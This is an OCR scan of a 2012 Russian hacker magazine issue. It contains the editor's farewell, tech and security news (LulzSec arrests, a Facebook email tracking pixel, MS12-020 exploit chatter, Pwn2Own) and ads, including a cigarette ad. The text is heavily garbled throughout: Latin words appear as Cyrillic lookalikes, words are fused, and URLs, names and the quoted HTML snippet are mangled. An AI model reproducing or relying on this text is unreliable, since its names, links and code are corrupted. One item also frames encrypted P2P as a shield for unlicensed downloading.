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Іпіго 





Сегодня особенный для меня вы пуск X, ну и вообще — наступил 
довольно трогательный момент. Дело в том, что юбилейный, 160-й 
вы пуск журнала последний для меня в роли главного редакторах. 
Со следующего выпуска я с гордостью передаю руководство про- 
ектом своему другу и коллеге Стёпе Ильину. 

Эти шесть лет для меня были, наверное, пока самыми важными 
в осознанной жизни: я здорово изменился и многому научил- 
ся. Оно и понятно: ведь с 20 до 26 лет человек априори многому 
обучается и априори взрослеет, нодля меня всеэто, безусловно, 
прошло под з на ком X, а журнал и все связанные с ним активности 
выступили значительным катализатором. За шесть летя сросся 
с журналом своим мозгом, друзьями и образом жизни. Работа в 
Хведьэто не просто работа: прежде всего это тусовка, друзья и 
любимоеувлечение. 

Поэтомуя, конечно, чувствую некоторуютрогательную горечь 
от своего решения: очень тяжел о отрывать кусок от самого себя и 
менять что-либо. Буду с теплотой вспоминать прошедшее время 
и все, что мы сделали здесь с моими друзьями. Неимоверно 
благодарен самому глав ному участи и куХ-д в ижения: всем нашим 
читателям итебе персонально. Респект, бро! 

Однако пришло время двигаться вперед — и мне, и журналу. 
Абсолютно уверен, что Стёпа будет феноменальным руководи- 
телем и быстро достигнет тех целей и задач, которые перед ним 
стоят. Все в порядке у этого решения и с преемственностью: Степа 
плотьотплотиХ-человек и прошел длинный путь от автора статей 
до главного редактора. Стёпа — невероятный человек, очень про- 
шу всех его поддержать. 

В общем -то, все. Еще надо ответить на самый частый из всех 
вопросов, которые мне задают: чем же я буду заниматься даль- 
ше? Короткий и абсолютно честный ответ: глобально я решу это в 
следующие шесть месяцев, которые проведу в США. Приехал сюда 
стремя цел я ми: улучшить свой английский, завести новых друзей 
и знакомых, найти свежие идеи и вдохновение. В данный момент 
сижу на лавочке в Централ парке и, честно говоря, с трудом пере- 
ключил мозг, чтобы на писать это Интро :]. Привет из Нью-Йорка! 

ПІІСІІ022, 

гл.ред.Х 



Р. 5. Забыл отдельно отметить: я полностью сохраняю свою связь 
с журналом, здесьостаются работать мои друзья. Крометого, 
все мои контакты остались прежними: меня можно легко достать 
по адресу пікііогйгеаі. хакер. ги . Не прощаюсь — уверен, что еще 
увидимся на страницахХ! 
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СПУСТЯ ПОЧТИ ТРИ ГОДА 
С МОМЕНТА ВЫХОДА ВЕТКИ 5.3 

был официально представлен релиз 
языка программирования РНР5.4.0. 



ШУТКИ В СТОРОНУ 

АРЕСТОВАНЫ УЧАСТНИКИ ИЛ.25ЕС 



ДЛЯСАМЫХЛЕНИВЫХ 
И КРЕАТИВНЫХ 



ы посвятили неоднустатьюдеятельностихакерской группы ЫиІ г 
5есигіІу, наделавшей много шума в прошлом году. Напомним, что 
передтем, как красиво «распасться», эти парниуспели поглумиться 
надЗопу, N іпіепсіо, несколькими американскими телекомпаниями (включая 
Рохи РВ5), американским сенатом, ЦРУ, полицией США и та к дал ее. Неуди- 
вительно, что правоохранительные органы самых разных стран мира были 
заинтересованы в их поимке и очень старались. 

В марте а мери канские спецслужбы объявили об аресте пяти членов груп- 
пы: подвое из Лондона (Кауіа иТоріагу) и Ирландии (рѵѵпзаисе и раііасііит], 
одного — из Чикаго (Апагсбаоз). Личности всех хакеров раскрыты. Поданным 
новостногоагентства РохЫеѵѵз, возглавлял группу 28-летний Хектор Ксавьер 
Монсегур, житель Нью-Йорка, отец двоих детей, безработный, известный под 
ником 5аЬи. Оказывается, он работал под прикрытием и снабжал информа- 
цией ФБР с самого 20 11 года, за что теперь может рассчитывать на смягчение 
приговора (условия сделки с ФБР не разглашаются]. Именно по его наводке 
и были арестованы остальные пятеро членов группы. Обвинения против хаке- 
ров выдвинуты стандартные для та кого случая: незаконное проникновение 
в компьютерные системы, удаление информации, похищение конфиденциаль- 
ныхданных, «включая зашифрованную и незашифрованную чувствительную 
персональную информацию о тысячах жертв». 





Хотя шестеро 
хакеров арестованы, 
некто выложил 
наУоиТиЬе ролик 
[ уоиШ.Ье/гХ629х- 
ѴѴБѵѵІ ). в котором 
заявляет, что 
І-иІгБесвозобновит 
своюдеятельность 
сі апреля. «Странно 
считать, чтоарест 
шестерыхчленов 
ШгБесмогбы 
остановить нас», — 
говорится в ролике. 



ЧТО ДЕЛАТЬ, ЕСЛИ НАДОЕЛО 
ВВОДИТЬ ПАРОЛИ ВРУЧНУЮ 

асто, очень 
часто нам 
приходит- 
ся набирать самые 
разные пароли. На- 
стоящие параноики 
знают, что галочка 
«сохранить пароль» 
хотя иудобна, но не 
слишком хороша 
сточки зрения безо- 
пасности. И вообще 
лучше пользоваться 
экранной клавиа- 
турой, старательно 
закрывая монитор 
отокружающих :]. 

Но каксовместить 
обыкновенную 
человеческую лень с безопасностью? Финский програм- 
мист Джу нас Пиладжамаа, похоже, нашел ответ на этот 
вопрос. Он сконструировал устройство, которое просто 
вставляется в разъем 115В, выдаетсебя за клавиатуру 
(115В НЮ) и само вводит нужные символы! Таким об- 
разом, Джу насу даже не нужно запоминать пароли, не то 
что набирать их. Также суперфлешка умеет и генериро- 
вать новые пароли, сохраняя их на будущее. Например, 
сгенерировать пароль с дефолтной длиной 10 символов 
можно четырехкратным нажатием клавиши Сарз Боек. 
Устройство размещено в корпусе старой ненужной 
115В -флешки, внутри собрана плата на базе 8-битного 
РІ5С-микроконтроллера АТІіпу85 и всех сопутствующих 
компонентов. У себя в блоге находчивый финн рас- 
сказывает, какзапрограммирован микроконтроллер, 
показывает исходники и демонстрирует схему платы: 
ІіпѵигІ.сот/73ѵѵсѵ5І"і . 







АРРІ_Е ВЫПУСТИЛА ІРАР 
ТРЕТЬЕГО ПОКОЛЕНИЯ, 

который называется просто 
«пеѵѵіРас1».За первыетри 
дня с начала продаж было 
реализовано болеетрех 
миллионов устройств! 




БЛОКИРОВАТЬ ЛИНКИ НА 
ТНЕРІКАТЕВАѴ.5Е начали 
ѴѴіпсІоѵѵз І_іѵе Меззепдег 
и другие ІМ-клиенты, 
использующие серверы 
МісгозоК. МБ пока не ком- 
ментирует ситуацию. 




В5КУРЕ ПОЯВИЛАСЬ ВЕСЬМА 
НЕПРИЯТНАЯ ФОРМА 
РЕКЛАМЫ. Совершая 
видеозвонок, будь готов 
увидеть вместолица 
собеседника рекламный 
баннер. 




САМЫЙ БЫСТРЫЙ В МИРЕ 
ЗО-ПРИНТЕР собрали 
вВенскомтехническомуни- 
верситете. Благодаря методу 
двухфотонной литографии 
скорость устройства дости- 
гает пяти метров в секунду. 




ПОБЕДУ ВО ВТОРОМ КОНКУР- 
СЕ РАСЕВООКНАСКЕКСЦР 

одержал россиянин Роман 
Андреев, 18-летний студент 
СПбГУ.Запервоеместоон 
получил приз в размере 5000 
долларов. 
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на правах рекламы 




Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (звонок бесплатный) 

или на сайте 

ѵѵѵш.тапсагсі.ги 



(дате)ІапИ 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 



МЕ6АЫЕѴѴ5 



НОВАЯ ФИШКА ОМАН: если письмо попало в спам, в его теле появится блок с пояснением, почему 

система сочла сообщение нежелательным. 



ПОДЗАРЯДКА ГАДЖЕТОВ 
ТЕПЛОМ ЧЕЛОВЕЧЕСКОГО ТЕЛА 



ХАКЕРЫ В НЕБЕ, 
ВКОСМОСЕИНАЛУНЕ 



УДИВИТЕЛЬНУЮ ТКАНЬ РАЗРАБОТАЛ ВЫПУСКНИК 
УНИВЕРСИТЕТАУЭЙК ФОРЕСТ (США) 



АМБИЦИОЗНЫЕ ПЛАНЫ ПАРНЕЙ С СНА05 
СОММІЖІСАТІОМСАМРИНЕТОЛЬКО 




Подробности ис- 
следований Кори 
Хьюита и детали 
о Роѵѵег^еІІ недавно 
были опубликованы 
вжурналеМапо 
І_еПег5. Статью мож- 
но найти поадресу: 
ІіпѵигІ.сот/ 8222 ѵѵН. 
однакоза чтение 
полной версии при- 
дется заплатить. 



□ огласись, в наши дни проблема подзарядки многочисленных мобиль- 
ных устройств очень актуальна. Если ты ведешь активный образ жизни 
и тебе постоянно нужно оставаться на связи, приходится носить с собой 
зарядник (а то и не один), постоянно искать розетки и та к дал ее. Увы, беспро- 
водная зарядка гаджетов пока несовершенна и поэтому малопопулярна. Но по- 
хоже, в ближайшем будущему нас могут появиться интересные альтернативы. 

Ученый КориХьюитразработал материал РоѵѵегІюІГ способный превращать 
теплочеловеческоготела вэнергиюдля коммуникаторов, плееров, планшетов. 
Любоеустройство можнозарядить, если просто носитьодежду, сделанную 
с применением РоѵѵегіюІІ. Похожее на кусок черного войлока устройство собра- 
но из углеродных нанотрубок и пластиковых волокон. Электричество выраба- 
тывается благодаря разницетемператур междутелом человека и окружающей 
средой. Хьюит поясняет, что, если из Роѵѵегіюіі сделать рубашку или пиджак, 
мощности хватит, чтобы поддерживать в рабочем состоянии плеер вроде ігіѵег. 

Чем холоднее на улице, тем эффективнее термоэлектрический матери- 
ал вырабатывает электричество. Да -да, в условиях русской зимы Роѵѵегіюіі 
будетособеннохорош :). Радуеттакже потенциальная доступностьразра- 
ботки: новый материал обойдется производителям примерно в один доллар 
за килограмм, азначит, рубашка из нановойлока не будет стоить несколько 
тысяч вечнозеленых денег. В настоящее время у ниверситетУэй к Форест, чьим 
выпускником является Хьюит, уже ведет переговоры с инвесторами на тему 
промышленного производства РоѵѵегІюК. 



ОТКАЗ ОТМНОГОТОМНЫХ БУМАЖНЫХ ИЗДАНИЙ 



СТАРЕЙШАЯ АНГЛИЙСКАЯ 
ЭНЦИКЛОПЕДИЯ«БРИТАННИКА» 
(ВЫПУСКАЕТСЯ УЖЕ 244 ГОДА) 
ПОЛНОСТЬЮ ПЕРЕХОДИТ 
НА ЦИФРОВЫЕ НОСИТЕЛИ 



аголовокэтои новости можетвызватьнедоумение 
и даже показаться немного сумасшедшим, однако 
группа немецких хакеров-акти вистов не видит 
в своей затее ничего смешного и невыполнимого. Эти парни 
собираются ни много ни малосконструироватьспутниковые 
модемы и запустить на орбиту сеть самодельных спутников, 
чтобы обеспечить работу свободной бесцензурной сети, 
неподконтрольной властям и медиакорпорациям. Ктаким 
кардинальным мерам ихподтолкнула приснопамятная 
БОРА — хотя ее пока и не приняли, угроза не миновала. 

В самом деле, медиакорпорации старательно закручивают 
интернету гайки, и о каких-тоальтернативахдуматьнужно. 
Амбициозный космический проектноситимя Наскегзрасе 
ЗІоЬаІ ЗгісІ ( 5Наскзрасе.с1е/ѵѵікі/с1оки.рНр?іс1=ргоіесІ:1ідд ). 
и впервыеонем рассказали на конгрессе СЬаоз 
Соттипісаііоп Сатр 201 1, что проходил в Берлине в конце 
зимы. Пока над проектом трудится маленькая, но гордая ко- 
манда изтрехчеловек:ЬсІ 2 иагтіп (Армии Бауэр) совместно 
с инженером Андреасом Хорнигом. 

Хакеры вполнездравооцениваютсвоисилы и понимают, 
что врядли имудастся самостоятельно построить«Буран» :). 
Парни предполагают, что если у них не получится скон- 
струировать ракеты, то можно будет заплатить российским 
или европейским компаниямза доставку груза на орбиту. 
Вообще планируется, что сеть будет состоять из передат- 
чиков и ретрансляторов, установленныхв«контрольных 
точках», сточным определением их местоположения по си- 
стемам ЗР5, ГЛОНАСС и Заіііео. Остается разработатьсами 
спутники, атакженаземныеустройства связи и протоколы 
для спутниковых коммуникаций. Три прототипа наземных 
базовых станци й планируют собратьуже в 2012 году, а гото- 
вые модели, возможно, даже покажутна следующем ССС. 
Интересно, что ориентировочная стоимостьустройства не 
должна превыситьЮОевро. 

Однакоальтернативный спутниковый интернет — это 
толькоперваязадача, которуюпоставилихакеры на 
конгрессе СЬаозСоттипісабоп Сатр. Второй проект еще 
круче: высадка астронавта-любителя на лунную поверх- 
ностьк2034году!Хакерыуверены,чтоэпоха, когдазапуском 
людей в космос занимались государственные организации, 
осталась в прошлом. Ксожалению, об этой части проекта 
пока известно очень мал о подробностей, так что нам остает- 
ся только пожелать парням удачи. Как бы то ни был о, ихупор- 
ство ижелание что-то изменитьуже вызываютуважение. 

Кстати, стоит сказать, что о небе недавно задумалась 
и команда торрент-трекера ТЬе Рігаіе Вау. В блогеТРВ 
появилась запись о том, что администрация ресурса вновь 
вернулась к размышлениям о месторасположении серверов. 
Напомним, чтовтяжелыедлятрекера времена рассматри- 
вались даже варианты покупки своей собственной страны, 
где серверы никто нетронет, строительства морской 
платформы или вариантзапуска серверов в космос и приоб- 
ретения собственногоспутника.Теперькоманда собирается 
разместить часть оборудован ия на борту беспилотных л е- 
тательныхаппаратов, которые будут курсировать над ней- 
тральными водами. На бортдронов погрузят, конечно, не все 
оборудование, а лишьузлы, которые«будутперенаправлять 
трафиквсекретноеместо».«Чтобы вывести нашусистемуиз 
строя, придется сбивать беспилотники. Аэто уже настоящие 
военныедействия», — говорится в блоге ресурса. 
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ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



ДХт Мы аілем.гд^орлірсі-іоиіііспмы^лѵішчі? продукту. 
Шш Вы знаете, что жжете кгійти юс рядом. под маркой ТАЗН 



Реклама 



МЕ6АЫЕѴѴ5 



ЗА ПЕРВЫЕ СУТКИ ПОСЛЕ ПУБЛИКАЦИИ БЕТА-ВЕРСИИ ЖІИВ0Ж58 ее скачали более одного миллиона раз. 



РАСЕВООК ШПИОНИТ 
ЗА ПОЛЬЗОВАТЕЛЯМИ 

СТРАННЫЙ КОД В ПИСЬМАХ ОТКРУПНЕЙШЕЙ 
СОЦИАЛЬНОЙ СЕТИ ПЛАНЕТЫ 




казывается, найти не слишком этичные штучки 
вроде картинок 1x1 рх можно не только в спаме, но 
и в письмахоттакогосерьезногоигрока ІТ-рынка, 
какРасеЬоок. Простой пользователь Карл Чатфилдобна- 
ружил в письмахотРасеЬоокследующий кусоккода: 

<зрап "><іт§ 5гс=30"Іі1:1:р://ммм.-РасеЬоок. 

сот/етаі1_ореп_1о§_ріс . рІір?тісІ=3051178Ь2С56е57сб 
сІОіИЧіБЬсбѲ" 5І=ѵ1е=ЗР"ЬогсІег :Ѳ;іл/ісІ1:Іі :1рх; Неі^ІіІ: : 
Ірх;" /хЬ^БоипсІ 5гс=ЗР"ІгЫр : //млм.-РасеЬоок. сот/ 
етаі1_ореп_1о§_ріс . рИр ? тісІ=ЗР51178Ь265бе57сбсІ61-р 
41БЬс6Ѳ&5=ЗРа" ѵо1ите=ЗР"-1ѲѲѲѲ"/></5рап> 

Поидее,тег<ЬдзоипсІ>предназначендля внедрения вдо- 
кументзвукового файла, который проигрывается в качестве 
фоновой музыки. Ріо сегодня по прямому назначению этоттег 
используюттолько совсем уж«альтернативно одаренные» 
личности. Выяснилось, что подобный код РасеЬооквстав- 
ляет в каждое письмо! Разумеется, музыка здесь ни при 
чем. В качестве звукового файла в письмахуказан скрипт 
на сервере РасеЬоок, который фиксируетобращения кнему 
изаписываетрезультаты влог. Компания можетанализи- 
ровать эффективность почтовых рассылок, высчитывать 
точный СТРи прочее. Гаденько, нозатоэффективно. 





Сам посебепо- 
чтовый шпионаж 
далеконенов, ис 
ним борются. Так, 
бтаіі блокирует 
всебезисключения 
подобныетипы 
контента, а вот 
«Яндекс. Почта», 
увы, пропускает 
саисііо Бге^'Шр:// 
ТКАСКІІЧС^КІ/"» 
</аисІіо>и 

сѵісіео 5гс="ІтЬ±р:// 

ТКАСКІІЧС^КІ/"» 

</ѵісІео>. 



КІОКІА ПРЕДСТАВИЛА 
СМАРТФОН С КАМЕРОЙ 
41 МП 



ФИННЫ РАЗРАБОТАЛИ НЕЧТО, ПОХОЖЕЕ НА 
ФОТОКАМЕРУ СО ВСТРОЕННЫМ СМАРТФОНОМ 

а выставке МоЬіІе 
ѴѴогІсІ Сопдгевз 
настоящий фурор 
произвел смартфон N окіа 
808 РигеѴіеѵѵ, уком- 
плектованный 41-ме- 
гапиксельной камерой 
(эффективное разрешение 
38 Мп)! Первоначальный 
прототип этого устройства 
был готов еще в 2008 году, 
но потребовалось более 
сорока конструктивных 
изменений, чтобы при- 
вести его к современному 
дизайну. Выход ІЧокіа 808 
РигеѴіеѵѵ под у правлением 
ОСЗутЫап ВеІІе намечен на второй квартал этого года, 
аппарат будет стоить около 450 евро. 

«Но как?!» — спросишь ты. Давай разберемся. В каме- 
ре используется датчик разрешением 41 Мп(7728 5368 
пикселей, размер пикселя 1,4 м км]. Формат датчика — 
1/1,2 дюйма, то есть он существенно крупнее датчиков 
не только большинства камер, встроенных в смартфоны 
(они имеют формат 1/3,2 дюйма), но и многих современных 
компактных камер. Однако именно высокое разрешение 
датчика используется для повышения качества снимков. 
Происходит это путем объединения да иных с соседних 
пикселей для получения итогового изображения. То есть 
по умолчанию камера формирует изображения в формате 
16:9 с разрешением 5 Мп. 

Но не стоит забывать, что ІЧокіа 808 РигеѴіеѵѵ — это 
еще и смартфон. Устройство оснащено АМОІ_ЕО-экраном 
размером 4 дюйма (640 360 пикселей). Объем встроен- 
ной памяти — 16 Гб (можно расширить с помощью карты 
формата тісгоЗО до32 Гб). Одноядерный процессор 
работает на частоте 1,3 ГГц. Время автономной работы 
в режиме разговора в сети 65М достигает одиннадцати 
часов, в сети ЖОМА — шести с половиной часов. 





«ЗЕЛЕНЫЕ» ТЕХНОЛОГИИ 
НАСЛУЖБЕ ІТ 
Дата-центр боодіе в Джор- 
джии охлаждается канали- 
зационнойоборотной водой, 
потребляя около378,54м 3 
вдень. 




Яшіех 



«ЯНДЕКС» ТЕПЕРЬ 
СОТРУДНИЧАЕТ С ТѴѴІТТЕК. 

Поисковикполучил полный 
доступ кзаписям юзеров 
и научился находитьтвиты 
через несколько секунд по- 
сле публикации. 




ЗАП0СЛЕДНИЕДВАГ0ДА 
НАСА ПОТЕРЯЛО 48 НОСИТЕ- 
ЛЕЙ информации, сообщает 
журнал РогЬез. На одном 
из ПК, кстати, содержались 
команды для управления 
МКС. 
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Ьаскегіѵѵееіз 



ГаіОпІс: 

Я всегда удивлялся, почему 
Арріе удаляет, например, кальку- 
лятор из іРасГов? 

(ЗтсІоѵѵсІ: 

йіОпіс Это такая фишка безопас- 
ности — избегать выпрыги- 
вающего калькулятора. Тут уже 
не покажешь демонстрацию работающего 
сплоита, запускающего саіс :). 



□ гаіиіді_аигіетта: 

М51 2-020-загадка: пакет, хра- 
нимый в «китайском» гбрсІіепТ 
ехе РоС, именно ТОТ САМЫЙ, 
что я передал в 201!!! Кто источник утечки? 
(сИЬегсІі? ЙтісгозоН? 

Н Комментарий: 

Наделавший много шума РоС- 
эксплоитдля М51 2-020 каким-то образом 
утек, о чем сообщает в своем твиттере 
автор, продавший уязвимость компании 
201. Кто виноват? 



ПЮерге55есЮаг(Іі: 

Заметил, что Оби-Ван отметился 
на Звезде Смерти с помощью 
Роигздиаге. 



ГаапІГіопаІіоп: 

Китайская киберармия, ну поче- 
му вы всегда оставляете свой 
е-таіі в боевой нагрузке? 




(Экруке: 

0К, стремительные бобры, не 
торопитесь скачивать любой 
попавшийся РуОооп -скрипт, 
который называет себя РОР-эксплоитом. Не 
все Питон-скрипты милые! 

Комментарий: 

Когда все ждут боевого МБ1 2-020, 
можно легко сыграть в социнженерию 
и подсунуть что-то плохое :). Интересно, 
сколько людей запустили у себя зловредный 
скрипт, увидев заветные слова «работаю- 
щий сплоит»? 



/ ' т ПШагакапоѵ: 

Кі л | Вышла новая версия СЬготе. 

- р ЙахЗЗОсІ — убийца 5ѴЗ- 

1 р уязвимостей! :] Отличная работа, 
Артур! 

Один из авторов ][ также отметился 
с взломом СНготе'а. Надеюсь, ты читал 
статью Артура Геркиса (йахЗЗОсІ) в одном 
из прошлых номеров. Ооодіе отблагодарил 
нашего супергероя и присвоил ему этот 
титул :). 



ГаСИгЫоІіпРіІеу: 

Подожди... так тот «неизвест- 
ный язык программирования», 
на котором был написан Оіщи... 
Всего лишь объектно-ориентированный Си 
(с компилятором М5ѴС 2008)? #БЛИН! 

□ Комментарий: 

Некоторое время назад Лаборатория 
Касперского заявила, что для создания Дуку 
был использован неизвестный язык про- 
граммирования. И вот развязка :). 



(ВБсагуЬеазіБ: 

Рѵѵпіипп отчет: доо.дІ/Ѵ2РѴѴ5. 

А также выяснили, что на 
#Рѵѵп20ѵѵп был всего лишь 
кроссбраузерный РІазЬ. Все самое крутое на 
#Рѵѵпіит. 



ПШіегсІі: 

0 пяти удаленных рге-аиОо 
Осіауз в БатЬа сообщили вчера, 
а сегодня от команды БатЬа 
получили етаіі о том, что патчи уже готовы. 
Отлично. 

Н Комментарий: 

А ведь что бы ни говорили, дыры есть 
везде. Не только у мелкомягких. Но зато 
одни производители быстро выпускают 
патчи, а другие — нет. 



(ЗіОпІс: 

Ну, в реальном мире атакующий 
не беспокоится о побеге из 
песочницы СЬготе'а. Он просто 
по возможности поимеет ядро. 



ГЭіОпІс: 

То, что персона У 
раскрыла багов вендору, не 
означает, что у него не осталось 
еще N багов в запасе. 



ГЭосНбН: 

Продал бы Аигіетта свой 
РОР-баг 201, если бы он был 
эксплуатируемый? Это нор- 
мальный бизнес-кейс — продавать неэк- 
сплуатируемые баги 201. 

Н Комментарий: 

Да, с боевым эксплоитом для М512- 
020 пока что проблемы. Похоже, что червя 
нам ждать пока рано.. 



ГЭѴІІРЕЫ: 

іѴ ,л . _ Зоодіе СЬготе — это пер- 
вый браузер, который пал на 
#Рѵѵп20ѵѵп 2012. Мы исполь- 
зовали эксплоит, обходящий ОЕР/АББР 
и песочницу, и смогли выполнить произ- 
вольный код! 

□ Комментарий: 

На прошедшем конкурсе Рѵѵп20ѵѵп 
победила команда ѴІІРЕІМ. Самое важное, 
что они сумели взломать браузер СЬготе 
и обойти его песочницу — комбинацию, 
считающуюся наиболее безопасной многи- 
ми экспертами. Детали уязвимости и обхода 
песочницы неизвестны. Даже Зоодіе... Так 
что — всем бояться, как обычно. 
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МЕ6АЫЕѴѴ5 



ПРОДАЖИ 5АМБІІМС ОМАХУ 5 II перешагнули рубеж в 20 миля ионов устройств. НаэтоБатзипд понадобилось 10 месяцев. 



СМАРТФОН, ПЛАНШЕТ, 
НОУТБУК. ВСЁ В ОДНОМ 

ИГОЛКА В ЯЙЦЕ, ЯЙЦО В УТКЕ, УТКА В ЗАЙЦЕ... 
ПОЧТИ ТАКЖЕ ВЫГЛЯДЯТ НОВЫЕ ТРАНСФОРМЕРЫ 
ОТ А51І5:) 

а выставке МоЬіІе ѴѴогІб Сопдгезз, прошед- 
шей в Испании, компания Азиз анонсировала 
гибридное устройство под названием РасІРопе. 
Этот хитрый девайс объед и няет в себе функционал ь- 
ностьсмартфона, планшетного ПКи ноутбука. Каким 
образом? Весьма простым. Итак, начнем с того, что А51І5 
РасІРопе — это современный Апбгоіб-смартфон. Основой 
изделия выступает двухъядерный процессор Зпарбгадоп 
54с интегрированным СРІІ Абгепо 225, работающий под 
управлением ОС Апбгоіб 4.0 (Ісе Сгеат ЗапбѵѵісЫ. Экран 
типа 5ирегАМ0І_Е0 имеет размер 4,3 дюйма и разрешение 
цЕЮ (960 540точек); покрытзащитным стеклом Согпіпд 
ОогіІІа с пленкой НСІ_Р. Объем флеш- памяти равен 16, 

32 или 64 Гб (в зависимости от модификации), причем 
его можно расширить с помощью карты памяти формата 
тісгоЗО. Устройство оснащено интерфейсами ВІиеІооФ 
4.0 и РЮМІ. Есть модуль 6Р5 (А-6Р5), электронный гиро- 
скоп и компас. Аппарат поддержи ваетѴѴСОМ А (900, 2100 
МГц), Е00Е/6РР5/65М (850, 1800 и 1900 МГц) и Н5РА+. Пи- 
тание обеспечивает батарея емкостью 1520 мАч. Имеется 
у аппарата и камера разрешением 8 Мп со светодиодной 
вспышкой, объективом с диафрагмой Р/2.2 и автофокуси- 
ровкой. Разрешение фронтальной камеры — 1,2 Мп. Все 
перечисленное пока вы глядит довольно обыденно. Но 
от огромного множества других смартфонов РасІРопе от- 
личают... необычныеаксессуары. Во-первых, докстанция 
РасІРопе Зіаііоп. Она расширяет функционал смартфона до 
полноценного планшетника, собственно — станция и вы- 
глядит как стильный планшете 10,1 -дюймовым тачскри- 
ном! Весь секрет в специальном отсеке для Раб-телефона. 
Смартфон просто устанавливается в специальный отсек 
в задней части станции, и легким движением руки по- 
лучается планшетный компьютер. Кстати, изображение 
«расширяется» не обычным масштабированием: при ме- 
няется технология динамического отображения, перена- 
страивающая Апбгоіб ІС5 на большой экран и повышенное 
разрешение (1280 800). Кроме того, при отключении 
РабРопе-станции сохраняется состояние каждого при- 
ложения! Буквально каждого — отэлектронной почты до 






игр. Вставил смартфон в станцию — продолжил работу 
с того же места. Никакой мороки с синхронизацией. 

У станции -планшета есть дополнительный аккумулятор, 
собственная 1, 3-мега пиксельная (1280 800 пикселей) ка- 



мера спереди, порты тісгоІІЗВ и тісгоЕЮМІ, стандартный 
3,5-миллиметровый аудиоразъем и динамики с известной 
технологией А51І55опісМазІег. 

Во-вторых, какбудто перечисленного было мало, ко 
всему этому можно также докупить док с клавиатурой! 
Подключив дополнительную клавиатуру, можно превра- 
тить связку смартфон + докстанция ваналогА51І5 Еее Раб 
ТгапзФгтег. В клавиатуре, кстати, тоже естьдополни- 
тельный аккумулятор, который повышает время автоном- 
ной работы РабРопе практически вдевятьраз! 

В-третьих, ко всемуэтому счастью прилагается еще 
и стилус РабРопеЗіуІиз НеабзеЕ Стилустоже немного 
трансформер — он не только используется для работы 
с экраном, но еще и является еще и ВІиеІооФ-гарнитурой. 

На российский рынок А51І5 РабРопе поступит в мае-июне 
этого года. Рекомендованная розничная ценаза комплект 
А51І5 РабРопе + РабРопе ЗіаЕоп составит отЗЗ 000 рублей. 




Азиз обновила линей- 
ку планшетов Еее РасІ 
ТгапБІогтег, переименовав 
еевТгапБІогтегРасі.Уже 
представлена первая модель 
обновленной серии — Іпііпііу. 
Иззаметных изменений: 
дисплей 10, Гтеперьимеет 
разрешение1920 1200, ав 
основе девайса лежит про- 
цессор ОиаІсоттБпарсігадоп 
54 (М5М8960), работающий на 
частоте 1,5 ГГц. 




ХАЙ-ТЕК ОТ КЕЫТ 

КЕІМТ представляетсигареты ІМапоІек2.0 впрогрессивном 
дизайне нового поколения. Впечатляющий стиль ІМапоІек 
2.0 создан на волне успеха КЕІМТ ІМапоІек первого поколения. 
Развиваяуспех, дизайнеры КЕІМТ разработали для линейки 
ІМапоІек 2.0 эффектные черные пачки в стиле хай-тек 
с сочетанием глянцевогоиматовоголаковыхпокрытий. 
Новый дизайн ставит КЕІЧТІМагіоІек 2. 0 в один ряд с ультра- 
современными гаджетами и аксессуарами. Изменившись 
внешне, компактные сигареты сугольным фильтром от КЕІМТ 
сохранили неизменным свой уникальный вкус. Три версии 
насыщенности вкуса КЕІМТ ІМапоІек 2.0 получили новые 
названия — ВІие, Бііѵег и ѴѴЫіе. На каждой версии— детали 
одного из трех цветов: синего, серебристого или белого. 





МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 







ВсэтЯЬоди Ш й <ТЕВЬЕ МОЛОЧНИК' произведена из цельного 
(не восстановлен но по) молока очень высокого качества 
Такой строгий контроль оказывается важным и для людей, 
заботящихся о здоровье, поскольку в последнее время ня рынке появилось 
лщшшшмелйк и разбавлений как молока, гак и продуктов ш,н$р. 





МЕ6АЫЕѴѴ5 



«РЕПОРТЕРЫ БЕЗ ГРАНИЦ» СОСТАВИЛИ ЕЖЕГОДНЫЙ СПИСОК СТРАН— врагов интернета. 

В 2012 году этот список пополнили Бахрейн и Беларусь. 



СТАРЫЕ-НОВЫЕ ГРАНИ 
ФАЙЛООБМЕНА 

ФАЙЛООБМЕН БЕЗ ЦЕНЗУРЫ И ДЕАНОНИМИЗАЦИИ ВСЕЖЕ 
СУЩЕСТВУЕТ В ПРИРОДЕ 




КеІгоЗИаге сейчас 
переживаетнастоя- 
щий взлет. Если еще 
вдекабре2011 года 
клиентКеІгоБЬаге 
скачаливсего2211 
раз, в феврале 
2012-гоэта цифра 
подскочила до21 379 
скачиваний,асейчас 
уже приближается 
кета тысячам. 



охоже, даже самые далекие от ІТ люди знают: правообладатели не 
дремлют, скачиватьфайлы из интернета страшно нелегально, иза 
это можно получить по шапке. В самом деле, не секрет, что копира- 
сты весьма пристально наблюдают за торрентами, пользователей то и дело 
судят, а крупные файлообменные ресурсы в последнее время и вовсе имеют 
тенденцию закрываться. Но ведь альтернативы трекерам и «Рапиде» суще- 
ствуют. Хороший пример — сеть РеІгоБЬаге, начавшая работу еще в 2006 году 
( геІгозЬаге.зоигсеіогде.пеі ). ТоггепіРгеак вообще сообщаето настоящем 
буме подобных анонимных систем. 

Схема работы РеІгоБЬаге проста. О реп Боигсе система РеІгоБЬаге дает 
пользователям возможность создавать приватные и зашифрованные Р2Р- 
сети.Ты можешьдобавлятьтуда друзей, проверяя их сертификаты РСР. 
Друзья, в свою очередь, добавят своих друзей, и та к дал ее. Идея в том, что 
в подобную сеть не должны попасть представители спецслужб и медиа- 
корпораций. Но даже если они туда проникнут, угроза все равно сведена к ми- 
нимуму — клиент уста на вливает соединение только с доверенными пирами. 
Все коммуникации защищаются с помощью 0реп55І_, а файлы от «незна- 
комцев» проходят по цепочке юзеров, так что в твой комп они попадают от 
доверенных друзей. Поскольку соединение надежно за шифровано, никто не 
сможет уличить тебя в скачивании нелицензионного контента. 




СВЕРХМИНИАТЮРНЫЙ 

ПРОЦЕССОРОТАРМ 

Н0І_0ІЫ65 

«ИНТЕРНЕТ ВЕЩЕЙ» СТАНОВИТСЯ БЛИЖЕ 



нтересный 32-битный микропроцессор Сог1ех-М0+ 
представила недавно компания АРМ Ноісііпдз. 
Уникальной особенностьюархитектуры РІусаІсЬег, 
на которой построена новинка, является размермикро- 
